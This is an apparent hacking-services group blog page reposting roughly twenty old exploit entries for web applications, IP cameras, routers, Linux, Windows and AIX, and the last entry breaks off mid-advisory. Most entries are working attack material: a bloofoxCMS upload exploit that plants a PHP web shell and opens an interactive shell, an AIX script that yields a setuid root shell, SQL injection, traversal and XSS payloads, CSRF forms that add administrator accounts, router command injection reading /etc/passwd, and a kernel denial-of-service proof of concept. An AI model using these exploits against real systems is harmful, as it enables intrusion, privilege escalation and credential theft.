Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153526

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/60782/info

Barnraiser Prairie is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to access arbitrary images in the context of the application. This may aid in further attacks. 

http://www.example.com/get_file.php?avatar=..&width=../../../../../../../../usr/share/apache2/icons/apache_pb.png
HireHackking

FtpLocate - HTML Injection 

source: https://www.securityfocus.com/bid/60760/info

FtpLocate is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

FtpLocate 2.02 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script>
HireHackking 
source: https://www.securityfocus.com/bid/60690/info

The RokDownloads component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

<?php

  $uploadfile="Amir.php.gif";

  $ch = 
  curl_init("http://www.exemple.com/administrator/components/com_rokdownloads/assets/uploadhandler.php");
  curl_setopt($ch, CURLOPT_POST, true);
  curl_setopt($ch, CURLOPT_POSTFIELDS,
                array('Filedata'=>"@$uploadfile"));
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  $postResult = curl_exec($ch);
  curl_close($ch);
  print "$postResult";

  ?>
HireHackking 
source: https://www.securityfocus.com/bid/60682/info

TP-LINK TL-PS110U Print Server is prone to a security-bypass vulnerability.

Attackers can exploit this issue to bypass certain security restrictions and obtain sensitive information which may aid in further attacks.
http://drupal.org/node/207891 

import telnetlib
import sys
host = sys.argv[1]
tn = telnetlib.Telnet(host)
tn.read_until("Password:")
tn.write("\r\n")
tn.read_until("choice")
tn.write("1\r\n")
tn.read_until("choice")
tn.write("1\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Device Name" in i:
        print i.strip()
    if "Node ID" in i:
        print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("2\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Manufacture:" in i:
        print i.strip()
    if "Model:" in i:
        print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("5\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Community" in i:
        print i.strip()
HireHackking 
source: https://www.securityfocus.com/bid/60660/info

et-chat is prone to a privilege-escalation vulnerability and an arbitrary shell-upload vulnerability.

An attacker can exploit these issues to gain elevated privileges within the application and upload arbitrary shells; this can result in an arbitrary code execution within the context of the vulnerable application.

et-chat 3.07 is vulnerable; other versions may also be affected. 

http://www.example.com/chat/?AdminRegUserEdit&admin&id=4
HireHackking 
/*
source: https://www.securityfocus.com/bid/60586/info

The Linux Kernel is prone to a local denial-of-service vulnerability.

Local attackers can exploit this issue to trigger an infinite loop which may cause denial-of-service conditions. 
*/

/*
** PoC - kernel <= 3.10 CPU Thread consumption in ext4 support. (Infinite loop)
** Jonathan Salwan - 2013-06-05
*/

#include <errno.h>
#include <fcntl.h>
#include <linux/fs.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>

struct ext4_new_group_input {
        __u32 group;
        __u64 block_bitmap;
        __u64 inode_bitmap;
        __u64 inode_table;
        __u32 blocks_count;
        __u16 reserved_blocks;
        __u16 unused;
};

#define EXT4_IOC_GROUP_ADD  _IOW('f', 8, struct ext4_new_group_input)

int main(int ac, const char *av[]){
  struct ext4_new_group_input input;
  int fd;

  if (ac < 2){
    printf("Syntax  : %s <ext4 device>\n", av[0]);
    printf("Example : %s /tmp\n", av[0]);
    return -1;
  }

  printf("[+] Opening the ext4 device\n");
  if ((fd = open(av[1], O_RDONLY)) < 0){
    perror("[-] open");
    return -1;
  }

  printf("[+] Trigger the infinite loop\n");
  input.group = -1;
  if (ioctl(fd, EXT4_IOC_GROUP_ADD, &input) < 0){
    perror("[-] ioctl");
  }

  close(fd);
  return 0;
}
HireHackking 
source: https://www.securityfocus.com/bid/60585/info

bloofoxCMS is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

bloofoxCMS 0.5.0 is vulnerable;other versions may also be affected. 

<?php
 
/*
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /        
  / XXXXXX /
 (________(          
  `------'
  
 Exploit Title   : Bloofox CMS Unrestricted File Upload Exploit
 Date            : 17 June 2013
 Exploit Author  : CWH Underground
 Site            : www.2600.in.th
 Vendor Homepage : http://www.bloofox.com/
 Software Link   : http://jaist.dl.sourceforge.net/project/bloofox/bloofoxCMS/bloofoxCMS_0.5.0.7z
 Version         : 0.5.0
 Tested on       : Window and Linux
  
  
#####################################################
VULNERABILITY: Unrestricted File Upload 
#####################################################
  
 This application has an upload feature that allows an authenticated user
with Administrator roles or Editor roles to upload arbitrary files to media
directory cause remote code execution by simply request it.

 
#####################################################
EXPLOIT
#####################################################
  
*/
 
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
 
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");
  
    fputs($sock, $packet);
    return stream_get_contents($sock);
}


  
if ($argc < 3)
{
print "\n==============================================\n";
print "  Bloofox CMS Unrestricted File Upload Exploit  \n";
print "                                              \n";
print "        Discovered By CWH Underground         \n";
print "==============================================\n\n";
print "  ,--^----------,--------,-----,-------^--,   \n";
print "  | |||||||||   `--------'     |          O   \n";
print "  `+---------------------------^----------|   \n";
print "    `\_,-------, _________________________|   \n";
print "      / XXXXXX /`|     /                      \n";
print "     / XXXXXX /  `\   /                       \n";
print "    / XXXXXX /\______(                        \n";
print "   / XXXXXX /                                 \n";
print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
print " (________(                                   \n";
print "  `------'                                    \n\n";
print "\nUsage......: php $argv[0] <host> <path> <user> <password>\n";
print "\nExample....: php $argv[0] target /bloofoxcms/ editor editor\n";
    die();
}
 
$host = $argv[1];
$path = $argv[2];

$payload = "username={$argv[3]}&password={$argv[4]}&action=login";

$packet  = "POST {$path}admin/index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$host}{$path}admin/index.php\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";

$response = http_send($host, $packet);

if (!preg_match("/Location: index.php/i", $response)) die("\n[-] Login failed!\n");
if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");

print "\n..:: Login Successful ::..\n";
print "\n..::   Waiting hell   ::..\n\n";

$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"filename\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";

$packet  = "POST {$path}admin/index.php?mode=content&page=media&action=new HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$host}{$path}admin/index.php?mode=content&page=media&action=new\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
     
http_send($host, $packet);
 
$packet  = "GET {$path}media/files/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
     
while(1)
{
    print "\nBloofox-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
 
?>
HireHackking 
source: https://www.securityfocus.com/bid/60533/info

The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.

NextGEN Gallery 1.9.12 is vulnerable; other versions may also be affected. 

#! /usr/bin/perl 
use LWP; 
use HTTP::Request::Common; 

my ($url, $file) = @ARGV; 

my $ua = LWP::UserAgent->new(); 
my $req = POST $url, 
Content_Type => 'form-data', 
Content => [. 
name => $name, 
galleryselect => 1, # Gallery ID, should exist 
Filedata => [ "$file", "file.gif", Content_Type => 
'image/gif' ] 
]; 
my $res = $ua->request( $req ); 
if( $res->is_success ) { 
print $res->content; 
} else { 
print $res->status_line, "\n"; 
}
HireHackking 
source: https://www.securityfocus.com/bid/60566/info

TaxiMonger for Android is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

TaxiMonger 2.6.2 and 2.3.3 are vulnerable; other versions may also be affected. 

<Script Language='Javascript'> <!-- document.write(unescape('%3C%69%6D%61%67%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2D%6C%61%62 %2E%63%6F%6D%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%27%69%73%6D%61%69%6C%6B%61%6C%65%65%6D%27%29%20%2F%3E')); //--> </Script>
HireHackking 
source: https://www.securityfocus.com/bid/60532/info

Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, and GXV3500 are prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. 

http://www.example.com/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0
HireHackking 
source: https://www.securityfocus.com/bid/60529/info

Sony CH and DH series IP cameras including SNCCH140, SNCCH180, SNCCH240, SNCCH280, SNCDH140, SNCDH140T, SNCDH180, SNCDH240, SNCDH240T, and SNCDH280 are prone to multiple cross-site request-forgery vulnerabilities.

Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. 

<html>
<body>
  <form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi" method="POST">
    <input type="Select" name="ViewerModeDefault" value="00000fff">
    <input type="Hidden" name="ViewerAuthen" value="off">
    <input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4=">
    <input type="Hidden" name="User1" value="xxxx,c0000fff">
    <input type="Hidden" name="User2" value="xxxx,c0000fff">
    <input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff">
    <input type="Hidden" name="User4" value="Og==,00000fff">
    <input type="Hidden" name="User5" value="Og==,00000fff">
    <input type="Hidden" name="User6" value="Og==,00000fff">
    <input type="Hidden" name="User7" value="Og==,00000fff">
    <input type="Hidden" name="User8" value="Og==,00000fff">
    <input type="Hidden" name="User9" value="Og==,00000fff">
    <input type="Hidden" name="Reload" value="referer">
    <script>document.SonyCsRf.submit();</script>
 </form>
</body>
</html>
HireHackking 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Pligg CMS 2.0.2
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://pligg.com/
Vulnerability Type:  Code Execution & CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

The file editor provides the possibility to edit .tpl files stored in the
templates directory.

But the file editor is vulnerable to directory traversal when saving files, and
it does not check the submitted filename against a whitelist of allowed files.
It also does not check the file extension. Because of this, it is possible to
gain code execution.

Admin credentials are required to access the file editor, but the request does
not have CSRF protection, so an attacker can gain code execution by getting the
admin to visit a website they control while logged in.

3. Proof of Concept


POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1

the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been send to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Code-Execution--CSRF-80.html
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=483

Windows: NtCreateLowBoxToken Handle Capture Local DoS/Elevation of Privilege
Platform: Windows 8.1 Update, Windows 10, Windows Server 2012
Class: Local Dos/Elevation of Privilege

Summary:
The NtCreateLowBoxToken API allows the capture of arbitrary handles which can lead to to local DoS or elevation of privilege. 

Description:

The NtCreateLowBoxToken system call accepts an array of handles which are stored with the new token. This is presumably for maintaining references to the appcontainer specific object directories and symbolic links so that they do not need to be maintained anywhere else. The function, SepReferenceLowBoxObjects which captures the handles has a couple of issues which can lead to abuse:

1) It calls ZwDuplicateObject which means the API can capture kernel handles as well as user handles. 
2) No checks are made on what object types the handles represent. 

The fact that kernel handles can be captured isn’t as bad as it could be. As far as I can tell there’s no way of getting the handles back. The second issue though is slightly more serious as it allows a user to create a reference cycle to kernel objects and potentially maintain them indefinitely, at least until a reboot. 

One way of doing this is to exploit the fact that threads can be assigned impersonation tokens. For example a new thread can be created and the handle to that thread captured inside the lowbox handle table. The resulting lowbox token can then be assigned as an impersonation token, the thread and token now maintain their references and the kernel objects survive the user logging out. As the thread references the process this also maintains the process object. 

Now at the point of logging out the process will be terminated but because the token maintains the reference cycle the process object itself will not go away. This can lead to a few results:

1) A user could open handles to important resources and files and prevent the handles getting released. This could ultimately result in a local DoS (although only something like a terminal server would be affected) and the administrator wouldn’t easily be able to fix it without rebooting as the process becomes hidden from typical task managers and trying to terminate it won’t help. 
2) If a user logs out then back in again they can reopen the process (by PID or using NtGetNextProcess) and get access to the original process token which is still marked as having the original session ID (something which would normally require TCB privilege to change). This might be exploitable to elevate privileges in some scenarios.

While the session object still exists in the kernel due to the reference cycle, it is dead so trying to create a process within that session will not work, however the user could release the reference cycle by clearing the thread’s impersonation token which will let session object be cleaned up and allow another user (again think terminal server) to login with that session ID. The user could then create a process in that session indirectly by impersonating the token and using something like the task scheduler. 

It isn’t immediately clear if the user would be able to access the session’s desktop/window station due to its DACL, but at the least references to the sessions object directory could be maintained (such as DosDevices) which might allow the user to redirect named resources for the user to themselves and get the privileges of the other user. This would be particularly serious if the other user was an administrator. 

Proof of Concept:

I’ve provided a PoC which will cause the reference cycle and display the process if it can open one. The archive password is ‘password’. Follow these steps: 

1) Extract the PoC to a location on a local hard disk which is writable by a normal user
2) Execute the poc executable file
3) The user should be automatically logged out
4) Log back in as the user
5) Execute poc again, it should now print out information about the stuck process and the extracted process token. 

Expected Result:
It shouldn’t be possible to generate a kernel object reference cycle

Observed Result:
The reference cycle is created and the user can reopen the process. 

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38580.zip
HireHackking 
Advisory ID: HTB23266
Product: Oxwall
Vendor: http://www.oxwall.org
Vulnerable Version(s): 1.7.4 and probably prior
Tested Version: 1.7.4
Advisory Publication:  July 1, 2015  [without technical details]
Vendor Notification: July 1, 2015 
Vendor Patch: September 8, 2015 
Public Disclosure: October 22, 2015 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-5534
Risk Level: High 
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Oxwall, which can be exploited to perform CSRF (Cross-Site Request Forgery) attacks. An attacker might be able to put the website under maintenance and perform XSS attacks against website visitors.

The vulnerability exists due to failure in the "/admin/pages/maintenance" script to properly verify the source of the HTTP request. A remote attacker can trick a logged-in administrator to visit a page with CSRF exploit and put the entire website under maintenance. Additionally, the attacker is able to inject arbitrary HTML and JavaScript code into maintenance message and execute it in browsers of any website visitor. Successful exploitation of this vulnerability may allow an attacker to steal other users’ cookies, spread malware to website visitors, and even obtain full control over vulnerable website. 

A simple CSRF exploit below puts the website under maintenance and displays a JS popup with "ImmuniWeb" word to every website visitor:


<form action = "http://[host]/admin/pages/maintenance" method = "POST">
<input type="hidden" name="form_name" value="maintenance">
<input type="hidden" name="maintenance_enable" value="on">
<input type="hidden" name="save" value="Save">
<input type="hidden" name="maintenance_text" value="<script>alert('ImmuniWeb');</script>">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>


-----------------------------------------------------------------------------------------------

Solution:

Update to Oxwall 1.8

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23266 - https://www.htbridge.com/advisory/HTB23266 - Cross-Site Request Forgery on Oxwall.
[2] Oxwall - http://www.oxwall.org/ - Oxwall® is unbelievably flexible and easy to use PHP/MySQL social networking software platform.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking 
source: https://www.securityfocus.com/bid/60526/info

Brickcom multiple IP cameras are prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.

Brickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerable; other versions may also be affected. 

<html>
<body>
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi"; method="POST">
<input type="hidden" name="action" value="add">
<input type="hidden" name="index" value="0">
<input type="hidden" name="username" value="test2">
<input type="hidden" name="password" value="test2">
<input type="hidden" name="privilege" value="1">
<script>document.gobap.submit();</script>
</form>
</body>
</html>
HireHackking 
#!/bin/sh
#
# Exploit Title: AIX 7.1 lquerylv privilege escalation
# Date: 2015.10.30
# Exploit Author: S2 Crew [Hungary]
# Vendor Homepage: www.ibm.com
# Software Link: -
# Version: - 
# Tested on: AIX 7.1 (7100-02-03-1334)
# CVE : CVE-2014-8904
#
# From file writing to command execution ;) 
#
export _DBGCMD_LQUERYLV=1
umask 0
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv

cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF

/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid
/tmp/r00tshell
HireHackking 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Pligg CMS 2.0.2
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://pligg.com/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

There are multiple SQL Injection vulnerabilities in Pligg CMS 2.0.2. One of
them does not require any credentials, and allows the direct extraction of data
from the database.

3. SQL Injection

Description

Pligg CMS is vulnerable to SQL injection. It is possible to extract data from
all databases that the pligg database user has access to.

Credentials are not required.

Proof Of Concept


http://localhost//pligg-cms-master/story.php?title=google-blabla&reply=1&comment_id=1%20union%20all%20select%201,1,1,1,1,1,1,password,password,1%20from%20mysql.user%20%23

Code


/story.php:168
if(isset($_GET['reply']) && !empty($parent_comment_id)){
        $main_smarty->assign('the_comments', get_comments(true,0,$_GET['comment_id']));
        $main_smarty->assign('parrent_comment_id',$parent_comment_id);
}
[...]
function get_comments ($fetch = false, $parent = 0, $comment_id=0, $show_parent=0){
        Global $db, $main_smarty, $current_user, $CommentOrder, $link, $cached_comments;

        //Set comment order to 1 if it's not set in the admin panel
        if (isset($_GET['comment_sort'])) setcookie('CommentOrder', $CommentOrder = $_GET['comment_sort'], time()+60*60*24*180);
        elseif (isset($_COOKIE['CommentOrder'])) $CommentOrder = $_COOKIE['CommentOrder'];

        if (!isset($CommentOrder)) $CommentOrder = 1;
        If ($CommentOrder == 1){$CommentOrderBy = "comment_votes DESC, comment_date DESC";}
        If ($CommentOrder == 2){$CommentOrderBy = "comment_date DESC";}
        If ($CommentOrder == 3){$CommentOrderBy = "comment_votes ASC, comment_date DESC";}
        If ($CommentOrder == 4){$CommentOrderBy = "comment_date ASC";}

[...]

        $comments = $db->get_results("SELECT *
        FROM " . table_comments . "
        WHERE (comment_status='published' $status_sql) AND
               comment_link_id=$link->id AND comment_id = $comment_id
        ORDER BY " . $CommentOrderBy);

4. Blind SQL Injection (Admin Area)

Description

There is a blind SQL Injection in the admin area of Pligg CMS. This allows an
attacker that gained admin credentials to extract data from the database.

The problem exists because the index of the submitted "enabled" POST array is
used in a query. The value is escaped - so using quotes in the injection is not
possible - but it does not place the value in between quotes.

Proof Of Concept


POST /pligg-cms-master/admin/admin_users.php HTTP/1.1

frmsubmit=userlist&admin_acction=2&token=VALID_CSRF_TOKEN&all1=on&enabled[2 AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23]=1

Code


// admin/admin_users.php
foreach($_POST["enabled"] as $id => $valuea)
{
        $_GET['id'] = $id = $db->escape($id);
        $user= $db->get_row('SELECT * FROM ' . table_users ." where user_id=$id");

5. Possibly SQL Injection

Description

The upload module is vulnerable to Blind SQL Injection via the "comment" as
well as "id" parameter.

The module seems to be unused at the moment, but if it were to be used in the
future, or if an attacker finds a different way to execute it, it would be
vulnerable.

The requests to trigger the vulnerabilities would be:

POST http://localhost/pligg-cms-master/modules/upload/upload.php
id=1&number=1&comment=1' AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23

POST http://localhost/pligg-cms-master/modules/upload/upload.php
id=1<script' or 1%3D1%23></script>&number=1&comment=1

Code


./modules/upload/upload.php:
if ($_POST['id'])
{
        $linkres=new Link;
        $linkres->id = sanitize($_POST['id'], 3);
        if(!is_numeric($linkres->id)) die("Wrong ID");
        if(!is_numeric($_POST['number']) || $_POST['number']<=0) die("Wrong number");
        if($_POST['number'] > get_misc_data('upload_maxnumber')) die("Too many files");

        // Remove old file and thumbnails with same number
        $sql = "SELECT * FROM ".table_prefix."files WHERE ".($isadmin ? "" : "file_user_id='{$current_user->user_id}' AND")." file_link_id='{$_POST['id']}' AND file_number='{$_POST['number']}' AND file_comment_id='$_POST[comment]'";

The first problem is that $_POST[comment] is never sanitized.

The second problem is that $_POST['id'] is first sanitized by removing tags,
then it is checked if that result is nummeric, and finally the original POST
value is used. Because of this, it is possible to put the injection inside tags
to bypass the check.

6. Solution

This issue was not fixed by the vendor.

7. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been send to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Multiple-SQL-Injections-82.html
HireHackking 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Pligg CMS 2.0.2
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://pligg.com/
Vulnerability Type:  Directory Traversal
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

The editor delivered with Pligg CMS is vulnerable to directory traversal, which
gives an attacker that obtained admin credentials the opportunity to view any
file stored on the webserver that the webserver user has access to.

Please note that admin credentials are required.

3. Proof of Concept


POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1

the_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&open=Open

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been send to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Directory-Traversal-81.html
HireHackking 
<!--
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-PRIV-ESCALATE.txt


Vendor:
================================
www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download


Product:
================================
PHP Server Monitor 3.1.1


Vulnerability Type:
=================================
Privilege Escalation / CSRF


Vulnerability Details:
=====================

PHP Server Monitor uses level 20 for basic user and level 10 for Admins these are stored in Database. Basic users can elevate thier privileges to that of Administrator
by crafting an HTTP payload changing their level to '10' then getting an Administrator to click an infected link or visit a malicious website to launch an
CSRF attack which will grant the user admin access. This problem is due to no CSRF protection mechanism in place. 


Exploit code(s):
===============

1) privilege escalation / CSRF
-->

<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>

<form id="HELL" action="http://localhost/phpservermon-3.1.1/?&mod=user&action=save&id=3" method="post">
<input type="text" name="user_name" value="hyp3rlinx" >
<input type="text" name="name" value="hyp3rlinx">
<input type="text" name="level" value="10">
<input type="text" name="password" value="">
<input type="text" name="password_repeat" value="">
<input type="text" name="email" value="ghostofsin@abyss.com">
<input type="text" name="mobile" value="">
<input type="text" name="pushover_key" value="">
<input type="text" name="pushover_device" value="">
</form>


</body>
</html>


<!--
Exploitation Technique:
=======================
Remote


Disclosure Timeline:
=========================================================
Vendor Notification: NA
Oct 30, 2015  : Public Disclosure


Severity Level:
=========================================================
High


Description:
==========================================================


Request Method(s):              [+]  POST


Vulnerable Product:             [+]  PHP Server Monitor 3.1.1
  

===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx
-->
HireHackking 
# Exploit title: Hitron Router (CGN3ACSMR) - Remote Code Execution 
# Author: Dolev Farhi (dolevf at protonmail.ch)
# Date: 29-10-2015
# Vendor homepage: http://www.hitrontech.com/en/index.php
# Software version: 4.5.8.16
# Hardware version: 1A

# Details:
Hitron routers provide an interface to test connectivity (ping, tracert) via the graphical user interface of the router (Management UI).
This interface is vulnerable to code injection using the && argument after the IP address.

# Steps to reproduce:
1. Navigate to the dashboard
2. Navigate to the admin tab
3. Type an ip address in the Destination form
4. append any code you want after the ip.

Example one: 
8.8.8.8 && cat /etc/passwd

Result

root:$1$27272727:0:0::/:/bin/false
nobody:$1$27272727:65535:65535::/:/bin/false
rogcesadmin:filtered/:100:100::/:/usr/sbin/cli
=============Complete==============



Example two:
8.8.8.8 && ip a 
PID USER VSZ STAT COMMAND
1 root 1268 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
5 root 0 SW [kworker/u:0]
6 root 0 SW< [khelper]
7 root 0 SW [irq/74-hw_mutex]
8 root 0 SW [sync_supers]
9 root 0 SW [bdi-default]
10 root 0 SW< [kblockd]
11 root 0 SW< [gPunitWorkqueue]
12 root 0 SW [irq/79-punit_in]
13 root 0 SW [kswapd0]
14 root 0 SW< [crypto]
HireHackking 
=============================================
- Release date: 29.10.2015
- Discovered by: Dawid Golunski
- Severity: High/Critical
- eBay Magento ref.: APPSEC-1045
=============================================

 
I. VULNERABILITY
-------------------------

eBay Magento CE <= 1.9.2.1       XML eXternal Entity Injection (XXE) on PHP FPM
eBay Magento EE <= 1.14.2.1      

 
II. BACKGROUND
-------------------------

